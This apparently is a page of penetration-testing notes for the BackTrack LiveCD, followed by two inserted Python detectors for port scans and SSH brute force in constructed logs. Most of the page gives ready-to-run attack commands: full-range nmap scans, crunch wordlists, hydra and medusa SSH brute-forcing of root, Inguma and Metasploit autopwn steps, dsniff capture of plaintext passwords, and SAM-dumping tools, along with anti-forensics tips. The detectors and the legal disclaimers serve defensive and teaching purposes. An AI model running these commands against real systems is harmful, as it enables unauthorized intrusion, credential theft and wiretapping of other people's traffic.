Disclaimer: be aware of local and federal laws. In the US, sniffing other users' traffic, even on your own network, constitutes wiretapping, is investigated by the Secret Service, and is classified as a federal felony.
www.usenix.org/event/lisa06/tech/slides/muentz.pdf
Sniff only your own traffic on your own network. If network maintenance is your job, check with a lawyer; the boss's permission is insufficient.
Instead of installing these tools, it's best to run off a LiveCD like BackTrack ("leave no trace" applies to both hiking and computing). If saving data is necessary, write to an encrypted USB stick or hard drive (TrueCrypt partition). Anti-forensics doesn't cost much.
To install apps on your box (on Linux):
$ sudo apt-get install nessusd
$ sudo nessus-mkcert
$ sudo nessus-adduser
$ cd /etc/init.d
$ sudo ./nessusd start
Packages installed with sudo apt-get install:
xtightvncviewer
tightvncserver on port 5901
virtualbox-ose
meld
wireshark
rapidsvn
mailutils
snort
dsniff
john [the ripper]
bkhive [dumping SAM file contents]
samdump2 [dumping SAM file contents]
virtualbox-ose-modules-2.6.24-19-generic
needed to add "username" to the "vboxuser" group
DNS responder:
http://use.perl.org/~hachi/journal/32409
If you set up a virtual network, you can have one box respond to the other box's requests
Boot into BackTrack LiveCD
The following commands are given assuming you won't use them to get in trouble. Don't call me from jail. Some of the commands below will land you in jail, literally, if used on the wrong target.
Aggressive scanning parameters, assuming you don't care about subtlety:
# nmap -p1-65535 -PN -sV --version-all -O --osscan-guess -v 10.0.0.1 > 10.0.0.1_scan_nmap_full_20020301.log
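A full-range scan like the one above is noisy on the target's side, which is why it shows up so clearly in a firewall log. The following detector is an added example written for this page, not something from the page or from nmap: it reads lines in the style of the Linux iptables LOG target (the sample lines are constructed, not captured traffic; the 10.0.0.x addresses, window size and threshold are assumptions) and flags any source that touches many distinct destination ports within a short window.

```python
import re
from collections import defaultdict, Counter
from datetime import datetime, timedelta

# Constructed sample lines in the style of the iptables LOG target (not real traffic).
# 10.0.0.7 touches 12 different ports in four seconds; 10.0.0.9 is ordinary SSH/HTTP use.
SAMPLE_FW_LOG = """\
Mar  1 10:00:01 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41000 DPT=21 SYN
Mar  1 10:00:01 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41001 DPT=22 SYN
Mar  1 10:00:01 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41002 DPT=23 SYN
Mar  1 10:00:02 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41003 DPT=25 SYN
Mar  1 10:00:02 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41004 DPT=53 SYN
Mar  1 10:00:02 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41005 DPT=80 SYN
Mar  1 10:00:03 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41006 DPT=110 SYN
Mar  1 10:00:03 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41007 DPT=139 SYN
Mar  1 10:00:03 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41008 DPT=143 SYN
Mar  1 10:00:04 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41009 DPT=443 SYN
Mar  1 10:00:04 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41010 DPT=445 SYN
Mar  1 10:00:04 gw kernel: IN=eth0 OUT= SRC=10.0.0.7 DST=10.0.0.1 PROTO=TCP SPT=41011 DPT=3306 SYN
Mar  1 10:00:05 gw kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.1 PROTO=TCP SPT=52000 DPT=22 SYN
Mar  1 10:00:09 gw kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.1 PROTO=TCP SPT=52001 DPT=80 SYN
Mar  1 10:00:40 gw kernel: IN=eth0 OUT= SRC=10.0.0.9 DST=10.0.0.1 PROTO=TCP SPT=52002 DPT=443 SYN
"""

# syslog timestamp, then the SRC= and DPT= fields we care about
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) .*?SRC=(?P<src>\S+) .*?DPT=(?P<dpt>\d+)"
)


def parse_ts(stamp):
    """Parse a syslog 'Mon  d HH:MM:SS' stamp (year defaults to 1900; only differences matter)."""
    return datetime.strptime(stamp, "%b %d %H:%M:%S")


def find_port_scanners(log_text, window=timedelta(seconds=60), min_ports=10):
    """Return {src: distinct_port_count} for every source that hit at least
    `min_ports` distinct destination ports within any `window`-long span."""
    events = defaultdict(list)  # src -> [(timestamp, dst_port)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events[m["src"]].append((parse_ts(m["ts"]), int(m["dpt"])))

    flagged = {}
    for src, evs in events.items():
        evs.sort()
        in_window = Counter()  # dst_port -> hits inside the sliding window
        left = 0
        for ts, port in evs:
            in_window[port] += 1
            # drop events that fell out of the window
            while ts - evs[left][0] > window:
                old_port = evs[left][1]
                in_window[old_port] -= 1
                if in_window[old_port] == 0:
                    del in_window[old_port]
                left += 1
            if len(in_window) >= min_ports:
                flagged[src] = max(flagged.get(src, 0), len(in_window))
    return flagged


if __name__ == "__main__":
    for src, count in find_port_scanners(SAMPLE_FW_LOG).items():
        print(f"possible port scan from {src}: {count} distinct ports")
```

The threshold is deliberately low so that the sample triggers; on a real gateway you would tune `min_ports` and `window` against normal traffic and, for a 65535-port sweep like the command above, the count climbs far past any reasonable threshold within seconds.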
Bruteforce SSH
Create a list of usernames/passwords to try. Note: generating the list is CPU intensive
cd /pentest/password
nice ./crunch 1 5 1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM > alphanumMixedCase.dic
Note: sshatter has a small password list at
/pentest/password/sshatter/passwords
medusa -d
to see what modules are available
medusa -h 10.0.0.1 -u root -p /pentest/password/sshatter/passwords -M ssh
Hydra is what I use:
hydra -s 22 -L /pentest/password/alphanumMixedCase.dic -P /pentest/password/alphanumMixedCase.dic -t 36 10.0.0.1 ssh2
note: the default number of tasks is 16
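On the receiving end, a wordlist run like the medusa or hydra commands above produces a burst of "Failed password" lines in sshd's log. The detector below is an added example for this page, not code from the page or from either tool: it reads lines in the format OpenSSH writes to /var/log/auth.log (the sample lines are constructed, not from a real host; the addresses, the five-minute window and the failure threshold are assumptions), flags sources that exceed the threshold, and marks the case that matters most, a successful login from a source that was already over the limit.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the format OpenSSH writes to /var/log/auth.log (not from a real host).
SAMPLE_AUTH_LOG = """\
Mar  1 12:00:01 srv sshd[2001]: Failed password for root from 10.0.0.7 port 41000 ssh2
Mar  1 12:00:01 srv sshd[2002]: Failed password for root from 10.0.0.7 port 41001 ssh2
Mar  1 12:00:02 srv sshd[2003]: Failed password for invalid user admin from 10.0.0.7 port 41002 ssh2
Mar  1 12:00:02 srv sshd[2004]: Failed password for root from 10.0.0.7 port 41003 ssh2
Mar  1 12:00:03 srv sshd[2005]: Failed password for invalid user test from 10.0.0.7 port 41004 ssh2
Mar  1 12:00:03 srv sshd[2006]: Failed password for root from 10.0.0.7 port 41005 ssh2
Mar  1 12:00:04 srv sshd[2007]: Accepted password for root from 10.0.0.7 port 41006 ssh2
Mar  1 12:05:00 srv sshd[2008]: Failed password for alice from 10.0.0.9 port 52000 ssh2
Mar  1 12:05:04 srv sshd[2009]: Accepted publickey for alice from 10.0.0.9 port 52001 ssh2
"""

TS = r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
FAIL_RE = re.compile(TS + r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")
OK_RE = re.compile(TS + r"Accepted \w+ for (?P<user>\S+) from (?P<src>\S+) port \d+")


def parse_ts(stamp):
    """Parse a syslog 'Mon  d HH:MM:SS' stamp (year defaults to 1900; only differences matter)."""
    return datetime.strptime(stamp, "%b %d %H:%M:%S")


def find_ssh_bruteforce(log_text, window=timedelta(minutes=5), max_failures=5):
    """Return {src: report} for sources with >= max_failures failed logins inside
    any `window`; report lists the peak failure count, every username tried from
    that source, and whether a login was accepted after the source was flagged."""
    events = defaultdict(list)  # src -> [(timestamp, accepted?, user)]
    for line in log_text.splitlines():
        m, accepted = FAIL_RE.match(line), False
        if not m:
            m, accepted = OK_RE.match(line), True
        if m:
            events[m["src"]].append((parse_ts(m["ts"]), accepted, m["user"]))

    report = {}
    for src, evs in events.items():
        evs.sort(key=lambda e: e[0])
        recent = []   # timestamps of failures still inside the sliding window
        users = set()
        for ts, accepted, user in evs:
            if accepted:
                if src in report:  # success after the source was already over the limit
                    report[src]["success_after_failures"] = True
                continue
            users.add(user)
            recent.append(ts)
            while ts - recent[0] > window:
                recent.pop(0)
            if len(recent) >= max_failures:
                entry = report.setdefault(
                    src, {"failures": 0, "users": [], "success_after_failures": False}
                )
                entry["failures"] = max(entry["failures"], len(recent))
                entry["users"] = sorted(users)
    return report


if __name__ == "__main__":
    for src, r in find_ssh_bruteforce(SAMPLE_AUTH_LOG).items():
        tag = " (LOGIN SUCCEEDED AFTERWARDS)" if r["success_after_failures"] else ""
        print(f"{src}: {r['failures']} failures, users tried: {r['users']}{tag}")
```

This is the same logic fail2ban applies before banning a source; the extra "success after failures" flag is what turns a noisy event into an incident, since a password that eventually worked is the outcome the wordlist run was after.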
Don't reinvent the wheel. Employ autopwn scripts:
https://wiki.remote-exploit.org/backtrack/wiki/Inguma
# cd /pentest/exploits/inguma
# ./inguma.py
> autoscan
brute force username and passwords: y
fuzz: y
> save kb
> exploit
# cd /pentest/fast-track
# python setup.py install
# ./fast-track.py -i
1 > update fast-track
9 > update everything
p > accept certificate
p > accept certificate
10 > return to main menu
2 > external hacking
3 > autopwn metasploit automated
1 > run metasploit autopwn
-p1-65535 -PN -sV -O -v 10.0.0.1-25
Manually
# cd /pentest/exploits/framework3
sudo apt-get install dsniff tcpxtract
capture plaintext passwords
$ sudo dsniff -i eth0 >> plaintext_passwords_date.log
capture list of URL requests
$ sudo urlsnarf -i eth0 >> urlsnarf_date.log
capture pictures, better than driftnet
$ sudo tcpxtract -d eth0
metasploit GUI usage:
browse to the exploit you'd like to use
right-click on the exploit, execute
choose target (specify IP, version)